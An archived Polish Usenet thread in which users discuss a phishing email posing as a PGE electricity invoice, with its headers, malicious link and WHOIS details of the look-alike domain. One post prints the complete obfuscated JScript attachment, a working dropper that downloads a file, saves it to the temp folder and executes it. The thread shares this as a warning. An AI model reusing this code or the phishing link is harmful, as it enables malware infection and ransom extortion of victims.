Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

[email] gkpge.pl eBOK Faktura za energie elektryczna 6700397951

69 views
Skip to first unread message

Piotr Lechowicz

unread,
Jun 8, 2016, 6:00:27 AM6/8/16
to
Oczywiście prądu od PGE nigdy nie kupowałem.



W treści:

Polska Grupa Energetyczna

PGE eFaktura za energię elektryczną 6700397951

Należnośc za okres od 12/03/2016 do 04/06/2016
IDENTYFIKATOR KLIENTA:4488695090 PDE: PLENED87720353660
FAKTURA VAT NR 7525257994/2016 KOPIA z dnia 01/06/2016
Należność do zapłaty 1.593,13 zł
Termin płatności 06/06/2016

i linki do http://hernia-de-disco.com/RXFbNa6xvS/rpjfXvaJP5Yt.php?id=<me>&num=4488695090


Do tego wydumana klauzula (zwróćcie uwagę na "u kreskowane"):


Prywatność i bezpieczeństwo danych Klient'ow T-Mobile Polska S.A. jest jednym z naszych priorytet'ow. Zależy nam, by nasi klienci mieli poczucie, że mogą na nas polegać, wiedząc, iż PGE S.A., zachowując najwyższą staranność, zagwarantuje by wszelkie powierzone nam dane i informacje były przetwarzane wyłącznie zgodnie z ich przeznaczeniem i chronione przed nadużyciami. Zapewnianie kompleksowego bezpieczeństwa oraz szeroko zakrojona ochrona danych to dla nas więcej niż tylko obowiązek przestrzegania wymog'ow statutowych i regulacyjnych – to także wyraźne świadectwo jakości naszych usług kierowanych do klient'ow i pracownik'ow. Dlatego też w grupie Deutsche Telekom, do kt'orej należy PGE S.A., wyznaczone zostały standardy w zakresie ochrony danych osobowych i prywatności obowiązujące wszystkie sp'ołki w jej obrębie. Więcej informacji na temat naszych zasad ochrony danych, obowiązujących w grupie Deutsche Telekom, można znaleźć w Wiążących Regułach Korporacyjnych Dotyczących Prywatności.


Piotr



Return-Path: <t.l...@comune.tivoli.rm.it>
Received: from smtp1.postapa.telecomitalia.it (smtp1.postapa.telecomitalia.it [156.54.55.84])
Received: from localhost (unknown [127.0.0.1])
by smtp1.postapa.telecomitalia.it (MSG3smtpd) with ESMTP id 8521027A4
Received: from smtp1.postapa.telecomitalia.it ([127.0.0.1])
by localhost (uca-mx01.local [127.0.0.1]) (amavisd-new, port 10024)
Received: from mail.postapa.telecomitalia.it (uca-exc01.tiucc.local [156.54.86.138])
by smtp1.postapa.telecomitalia.it (MSG3smtpd) with ESMTP id 97D0327A3
Received: from netblock-66-245-216-223.dslextreme.com (66.245.216.223) by
UCA-EXC01.tiucc.local (2002:9c36:56c6::9c36:56c6) with Microsoft SMTP Server
(TLS) id 15.0.1044.25; Tue, 7 Jun 2016 14:01:58 +0200
Message-ID: <AC561A90F22608FB...@comune.tivoli.rm.it>
From: "gkpge.pl eBOK" <t.l...@comune.tivoli.rm.it>
To: <me>
Subject: Faktura za energie elektryczna 6700397951
Date: Tue, 7 Jun 2016 14:01:35 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_22D0_01D1C0C5.1A49A7A0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Windows Live Mail 15.4.3538.513
X-MimeOLE: Produced By Microsoft MimeOLE V15.4.3538.513
X-Originating-IP: [66.245.216.223]
X-ClientProxiedBy: UCA-EXC02.tiucc.local (2002:9c36:56c7::9c36:56c7) To
UCA-EXC01.tiucc.local (2002:9c36:56c6::9c36:56c6)
X-Virus-Status: Clean

Andrzej Stróżyński

unread,
Jun 8, 2016, 9:32:10 AM6/8/16
to
W dniu 2016-06-08 o 12:56, Waldek Godel pisze:
> Dnia Wed, 8 Jun 2016 11:59:43 +0200, Piotr Lechowicz napisał(a):
>
>> Oczywiście prądu od PGE nigdy nie kupowałem.
>>
>
> To jest wirus a nie spam.
> Typowe metody blokowania spamu tu się nie sprawdzą.

Że zamiast reklamy jest link do wirusa?
Masowo wysyłana, niezamawiana korespondencja to SPAM.
Od trzech dni dostaję, codziennie z innego adresu.


--
pozdrawiam
AS

Arni

unread,
Jun 8, 2016, 9:50:25 AM6/8/16
to
W dniu 08.06.2016 o 15:32, Andrzej Stróżyński pisze:
tak tak, spam. Na pewno wysłany z PGE. Zajrzałbyś chociaz do nagłowków i
nie gadał głupot. O tym że link prowadzi na jakis trefny serwer to widać
na pierwszy rzut z linka. Dla ciekawych poniżej kod z tej "faktury"
(faktura_PGE.js):

function Tzdvv() {
var CLkeSdGK = "eof W";
return CLkeSdGK;
}
function INn() {
var PAvhJ = "pt.StdI";
var fHTzy = ["yp" + Tzdvv() + "S", "cri" + PAvhJ + "n"];
var XLqBHzrx = "t" + fHTzy[0] + fHTzy[1];
return XLqBHzrx;
}
function rhMkmBh(AaxjET) {
var paMz = 'eva';
return new Function('e', 'return ' + paMz + 'l(e);')(AaxjET);
}
function BRjjPis(cbkxqdR) {
var FDKq = 'rseI';
return new Function('e', 'return pa' + FDKq + 'nt(e);')(cbkxqdR);
}
function WXY() {
var AQmHzENg = "leng";
return AQmHzENg;
}
function uRaxm(Mlq, pyukYU) {
var nFrkrI = "'.cha";
var Yhdwitw = new Function("return '" + Mlq + nFrkrI + "rAt(" + pyukYU
+ ");")();
return Yhdwitw;
}
function DVjQQ(weQp) {
if (rhMkmBh(INn()) == ["object"][0]) {
var TBzwmPnM = [
[''][0]
][0];
var zufehmB = 0;
var RTFjB = 'WHaKpHXZjuNFOF';
}
var hJuDR = RTFjB[WXY() + "th"];
var aMHBleO = 0;
var rAHR = "";
var MVcYxxQq = weQp[WXY() + "th"];
while (aMHBleO < MVcYxxQq - 2) {
var ZSth = [(0)][(0)];
var OLtCLf = aMHBleO + 1;
var nqnb = uRaxm(weQp, OLtCLf);
var FCZwx = uRaxm(weQp, aMHBleO + 2);
var szLPXCf = uRaxm(weQp, aMHBleO);
rAHR = szLPXCf + nqnb + FCZwx;
var CXtJziuS = uRaxm(weQp, aMHBleO);
var gXUuoiv = uRaxm(weQp, aMHBleO + 1);
var WiYxW102 = (gXUuoiv == 0);
if (CXtJziuS == ZSth) {
var ftTHySjw = aMHBleO + 1;
var TWuoP = aMHBleO + 2;
var uMZO = uRaxm(weQp, TWuoP);
rAHR = uRaxm(weQp, ftTHySjw) + uMZO;
}
var ikIX = uRaxm(weQp, aMHBleO);
var WiYxW101 = (ikIX == 0);
if (WiYxW101 && WiYxW102) {
var BOfuvEn = aMHBleO + 2;
rAHR = uRaxm(weQp, BOfuvEn);
}
zufehmB = BRjjPis(rAHR);
var bzyXTM = aMHBleO / 3;
var YhzYWBg = bzyXTM % hJuDR;
var jdqz = "arCodeAt";
var WiYxW = RTFjB["ch" + jdqz](YhzYWBg);
zufehmB = zufehmB ^ WiYxW;
var SsHf = String;
var JEvGxitv = "CharCode";
TBzwmPnM = TBzwmPnM + SsHf["from" + JEvGxitv](zufehmB);
var TtluA = 3;
aMHBleO = aMHBleO + TtluA;
}
return TBzwmPnM;
}
var PYjrQZlY = "020036014056021";
var MvQScQ =
"004043019034000060049052013091008047035035004049018063021037023056000016045050";
var YHFyorXSy = "003049017046";
var DUlNzGMy = "036045015047";
var vhA = "035049017046031046120013057022060047063050121024000063024";
var pWUDxy = "000027002057025056044116057029043042035";
var sGkxkAtfd = "056056004037";
var jgHanW = "026027057006060122118002039057006018027022";
var tCtuGpR = "016013053";
var ZFYRqn =
"063060021059074103119044011022047040044035036101008039021059117062015088060035057035121043014038095046042059004022043036063054059041015056006041059059004022043053096049039101008037019036045062015006097032038042050102004051021";
var iCSINbJrp = "000058008063021";
var bmSvuCSP = "005045018059031038043063040026042063";
var gSiOdui = "004060000063005059";
var dFC = "000027002057025056044";
var wurpNYAk = "016045021024000045059051011025008041035034050058";
var adVxbx =
"063060021059074103119051009026096039060053056102007057095063040119009026032050042040035103017039005047049052025090035042098053059033005046002103062051006016096035055035";
var SLpJn = "036060019034030047";
var MhLuMjIe = "007039018034004033055052";
var Yre = "016045021031021037040020011024043";
var ACWC = "004041023046036039030051006016";
var dHpeqHu = "037061015";
var ujFvZYX = "052037005101021048061122069022110";
var DoXLOa = "022012046015050102011046024016047043";
var aEodv = "024056004037";
var mjSkkDx = DVjQQ(SLpJn);
var HVjHFeL = DVjQQ(vhA);
var pKwR = eval(HVjHFeL);
var ebbUvTj = DVjQQ(dFC);
var sTiBMsMp = eval(ebbUvTj);

function eIjmP() {
var xXMGErLq = DVjQQ(adVxbx);
return xXMGErLq;
}
function RoAy() {
try {
if (pKwR == mjSkkDx) {
var bbSSQX = DVjQQ(jgHanW);
var SSoMbkeV = sTiBMsMp;
var FILsX = '';
if (dQhpALI) {
FILsX = eIjmP();
} else {
FILsX = DVjQQ(ZFYRqn);
}
var PVnwAE = new[ActiveXObject][0](bbSSQX);
var QajS = DVjQQ(DoXLOa);
var bJRVBKko = DVjQQ(tCtuGpR);
PVnwAE[DVjQQ(sGkxkAtfd)](bJRVBKko, FILsX, false);
try {
PVnwAE[DVjQQ(DUlNzGMy)]();
} catch (exyZ) {
dQhpALI = true;
RoAy();
}
var usHNXpy = DVjQQ(MvQScQ);
var nagio = new ActiveXObject(usHNXpy);
}
if (PVnwAE[DVjQQ(gSiOdui)] == 200) {
var ITKzUU = new ActiveXObject(QajS);
var OVbFR = DVjQQ(Yre);
var pbRbwj = '\\' + nagio[OVbFR]();
var khYIylJ = nagio[DVjQQ(wurpNYAk)](2) + pbRbwj;
ITKzUU[DVjQQ(aEodv)]();
var tXgcRR = DVjQQ(pWUDxy);
ITKzUU[DVjQQ(YHFyorXSy)] = 1;
var LLUzHW = new ActiveXObject(tXgcRR);
var zzvB = PVnwAE[DVjQQ(bmSvuCSP)];
ITKzUU[DVjQQ(iCSINbJrp)](zzvB);
ITKzUU[DVjQQ(MhLuMjIe)] = 0;
ITKzUU[DVjQQ(ACWC)](khYIylJ);
ITKzUU[DVjQQ(PYjrQZlY)]();
var wXBfh = DVjQQ(ujFvZYX) + khYIylJ;
LLUzHW[DVjQQ(dHpeqHu)](wXBfh, 0);
} else {
if (dQhpALI == false) {
dQhpALI = true;
RoAy();
}
}
} catch (e) {}
}
var dQhpALI = false;
if (pKwR == mjSkkDx) RoAy();


--
Arni


Arni

unread,
Jun 8, 2016, 9:57:28 AM6/8/16
to
W dniu 08.06.2016 o 15:50, Arni pisze:

> tak tak, spam. Na pewno wysłany z PGE. Zajrzałbyś chociaz do nagłowków i
> nie gadał głupot. O tym że link prowadzi na jakis trefny serwer to widać
> na pierwszy rzut z linka. Dla ciekawych poniżej kod z tej "faktury"
> (faktura_PGE.js):

i jeszcze domena. Zobacz kiedy zarejestrowana i gdzie:

Domain Name: EBOK-PGE43.ORG
Domain ID: D189062696-LROR
WHOIS Server:
Referral URL: www.namesilo.com
Updated Date: 2016-06-06T10:00:06Z
Creation Date: 2016-06-06T09:48:02Z
Registry Expiry Date: 2017-06-06T09:48:02Z
Sponsoring Registrar: Namesilo, LLC
Sponsoring Registrar IANA ID: 1479
Domain Status: clientDeleteProhibited
https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited
https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited
https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited
https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited
https://icann.org/epp#serverTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registrant ID: NS-DFB092FE7B48B
Registrant Name: Domain Administrator
Registrant Organization: See PrivacyGuardian.org
Registrant Street: 1928 E. Highland Ave. Ste F104
Registrant Street: PMB# 255
Registrant City: Phoenix
Registrant State/Province: AZ
Registrant Postal Code: 85016
Registrant Country: US
Registrant Phone: +1.3478717726
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: pw-1bbfcca3f59c37...@privacyguardian.org
Admin ID: NS-DFB092FE7B48B
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104
Admin Street: PMB# 255
Admin City: Phoenix
Admin State/Province: AZ
Admin Postal Code: 85016
Admin Country: US
Admin Phone: +1.3478717726
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: pw-1bbfcca3f59c37...@privacyguardian.org
Tech ID: NS-DFB092FE7B48B
Tech Name: Domain Administrator
Tech Organization: See PrivacyGuardian.org
Tech Street: 1928 E. Highland Ave. Ste F104
Tech Street: PMB# 255
Tech City: Phoenix
Tech State/Province: AZ
Tech Postal Code: 85016
Tech Country: US
Tech Phone: +1.3478717726
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: pw-1bbfcca3f59c37...@privacyguardian.org
Name Server: NS1.OLDCAN.AT
Name Server: NS2.OLDCAN.AT
DNSSEC: unsigned



--
Arni

SCIGACZ.PL to szambo a jego właściciel to chuj.
Pisząc przez bramkę na newsy dostajesz na dzień dobry -50 do lansu.
Jeśli masz zamiar o coś zapytać to poszukaj jak skonfigurować czytnik
grup newsowych i pisz na pl.rec.motocykle.
Jeśli nie potrafisz tego zrobić to lepiej nie pytaj wcale, poszukaj
forum na scigacz.pl, jest ono dostosowane do Twojego IQ

Andrzej Stróżyński

unread,
Jun 8, 2016, 10:44:02 AM6/8/16
to
W dniu 2016-06-08 o 15:57, Arni pisze:
> W dniu 08.06.2016 o 15:50, Arni pisze:
>
>> tak tak, spam. Na pewno wysłany z PGE. Zajrzałbyś chociaz do nagłowków i
>> nie gadał głupot. O tym że link prowadzi na jakis trefny serwer to widać
>> na pierwszy rzut z linka. Dla ciekawych poniżej kod z tej "faktury"
>> (faktura_PGE.js):
>
> i jeszcze domena. Zobacz kiedy zarejestrowana i gdzie:
[...]

Czy ja napisałem, że to wysyła PGE?
Wręcz wprost stwierdziłem, że dostałem trzy i każdy z innego adresu.
Że prowadzi do wirusa to też napisałem.
Gdzie więc te moje "głupoty"?


--
pozdrawiam
AS

Arni

unread,
Jun 8, 2016, 12:18:11 PM6/8/16
to
W dniu 08.06.2016 o 16:44, Andrzej Stróżyński pisze:
czy uważasz, że ten mail służy reklamowaniu usług PGE?


--
Arni

Andrzej Stróżyński

unread,
Jun 9, 2016, 2:29:10 AM6/9/16
to
W dniu 2016-06-08 o 18:18, Arni pisze:
A czytasz ze zrozumieniem?

> W dniu 08.06.2016 o 16:44, Andrzej Stróżyński pisze:
> Że zamiast reklamy jest link do wirusa?

No to jeszcze raz, tym razem jaśniej:
Nie uważam, że jest to reklama PGE, ani że PGE ma cokolwiek wspólnego z
tymi mailami.

Dlaczego uważam, że to spam? Bo spełnia warunki:
- jest korespondencją niezamawianą,
- masowo wysyłana ta sama treść,
- nadawca chce odnieść korzyść (okup za ew. odszyfrowanie danych).


--
pozdrawiam
AS

Andrzej Stróżyński

unread,
Jun 10, 2016, 7:28:36 AM6/10/16
to
W dniu 2016-06-09 o 16:09, Waldek Godel pisze:
> Dnia Thu, 9 Jun 2016 08:29:12 +0200, Andrzej Stróżyński napisał(a):
>
>> - masowo wysyłana ta sama treść,
>
> To nie jest wysyłane masowo, każdy host wysła ledwie kilka maili, czasem
> kilkanaście, żeby uniknąć wykrycia.
> Tylko hostów jest dużo.
> To nie jest spam, to jest scam/wirus.
> Spam zawiera treści reklamowe (co niekoniecznie znaczy, że reklamuje firmę)

Dyskusja robi się akademicka.
Przyjmuję twoje argumenty.
Dodam jedynie, że np. na Wikipedii można przeczytać, że scam to odmiana
spamu :)


--
pozdrawiam
AS

Abdullah Shokr

unread,
Feb 8, 2024, 2:10:42 PM2/8/24
to
0 new messages